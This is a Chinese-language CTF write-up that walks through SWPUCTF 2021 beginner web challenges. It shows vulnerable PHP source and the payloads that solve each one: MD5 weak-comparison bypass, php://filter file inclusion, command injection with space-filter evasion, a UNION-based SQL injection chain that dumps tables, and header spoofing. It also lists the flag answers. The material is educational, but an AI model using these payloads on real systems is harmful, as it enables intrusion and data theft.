位置：首页-资讯-后端开发

[SWPUCTF] 2021新生赛之（NSSCTF）刷题记录 ①

2023-08-31 17:42

短信预约 -IT技能 免费直播动态提醒

[SWPUCTF] 2021 新生赛（NSSCTF刷题记录wp）

NSSCTF平台：https://www.nssctf.cn/

[SWPUCTF 2021 新生赛]gift_F12

直接查看源代码F12搜flag即可。
在这里插入图片描述

NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}

[第五空间 2021]签到题

NSSCTF{welcometo5space}

[SWPUCTF 2021 新生赛]jicao

highlight_file('index.php');include("flag.php");$id=$_POST['id'];$json=json_decode($_GET['json'],true);if ($id=="wllmNB"&&$json['x']=="wllm"){echo $flag;}?>

所以为满足if条件，输出flag，构造Payload：

get：json={"x":"wllm"}post：id=wllmNB

在这里插入图片描述

NSSCTF{037de6d6-3b9e-4bb9-903f-4236c239b42a}

[SWPUCTF 2021 新生赛]easy_md5

  highlight_file(__FILE__); include 'flag2.php'; if (isset($_GET['name']) && isset($_POST['password'])){    $name = $_GET['name'];    $password = $_POST['password'];    if ($name != $password && md5($name) == md5($password)){        echo $flag;    }    else {        echo "wrong!";    } }else {    echo 'wrong!';}?>

这里就是md5碰撞了这里要求a和b输入值不相同，md5加密后的值弱类型相等，就想到了0e的科学计数法

这里需要让password != name 又需要让他们的md5值相等，所以我们需要md5绕过这里可以用bp和hackbar

QNKCDZO，s878926199a

在这里插入图片描述

NSSCTF{bc1ccfc9-194c-4f11-809a-3a39293691fc}

[SWPUCTF 2021 新生赛]caidao

直接告诉了密码蚁剑直接连 flag在根目录下面。
在这里插入图片描述

NSSCTF{6bb489d4-e364-4302-ad0a-35cb90ee4534}

[SWPUCTF 2021 新生赛]include

在这里插入图片描述

Payload：?file=php://filter/convert.base64-encode/resource=flag.php

在这里插入图片描述

NSSCTF{4b858152-b482-4984-a358-ad8dc781923e}

[SWPUCTF 2021 新生赛]easyrce

在这里插入图片描述

?url=system("ls /");  #发现了 flllllaaaaaaggggggg

在这里插入图片描述

NSSCTF{4ddfeb4b-a30e-42a9-8bf4-f8a480a8b083}

[SWPUCTF 2021 新生赛]easy_sql

在这里插入图片描述
这里告诉我们了传入的参数是wllm 发现有报错，说明存在注入点存在字符型注入用order by 查询字段数，查得字段数为3输入4就报错

在这里插入图片描述

?wllm=-1' union select 1,2,3 --+  ##-1  一个负数不存在的id值来触发报错

在这里插入图片描述

-1' union select 1,2,database(); --+  ##爆破数据库

在这里插入图片描述

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='test_db'--+  #爆破表

在这里插入图片描述
这里有两个表test_tb和users 将tables的字段替换成column字段先看test_tb

wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='test_tb'--+

在这里插入图片描述

-1' union select 1,2,group_concat(id,flag) from test_tb --+ #查询

在这里插入图片描述

NSSCTF{94713769-163e-4e8d-a310-98e17dd7bd37}

[第五空间 2021]WebFTP

使用御剑扫描后台访问phpinfo.php 搜索FLAG即可。

在这里插入图片描述

NSSCTF{5d64eb71-b973-4708-a275-8f0cf576990b}

[SWPUCTF 2021 新生赛]babyrce

 <?phperror_reporting(0);header("Content-Type:text/html;charset=utf-8");highlight_file(__FILE__);if($_COOKIE['admin']==1) {    include "../next.php";}else    echo "小饼干最好吃啦！";?> 小饼干最好吃啦！

bp抓包改cookie值 admin=1 出现了rasalghul.php进行访问然后又是代码审计

在这里插入图片描述

 <?phperror_reporting(0);highlight_file(__FILE__);error_reporting(0);if (isset($_GET['url'])) {  $ip=$_GET['url'];  if(preg_match("/ /", $ip)){      die('nonono');  }  $a = shell_exec($ip);  echo $a;}?>

这里是烧过空格 ?url=cat${IFS}/f*
在这里插入图片描述

NSSCTF{4f2323c6-1c66-49d4-98c0-65f184730a7b}

[SWPUCTF 2021 新生赛]Do_you_know_http

在这里插入图片描述
直接抓包然后修改User-Agent:WLLM和本地访问X-Forwarded-For：127.0.0.1 访问/secretttt.php即可得到flag。

在这里插入图片描述

NSSCTF{1c22fbcd-0661-40d6-921c-01b09b3257a6}

[SWPUCTF 2021 新生赛]ez_unserialize

在这里插入图片描述

 <?phperror_reporting(0);show_source("cl45s.php");class wllm{    public $admin;    public $passwd;    public function __construct(){        $this->admin ="user";        $this->passwd = "123456";    }        public function __destruct(){        if($this->admin === "admin" && $this->passwd === "ctf"){            include("flag.php");            echo $flag;        }else{            echo $this->admin;            echo $this->passwd;            echo "Just a bit more!";        }    }}$p = $_GET['p'];unserialize($p);?>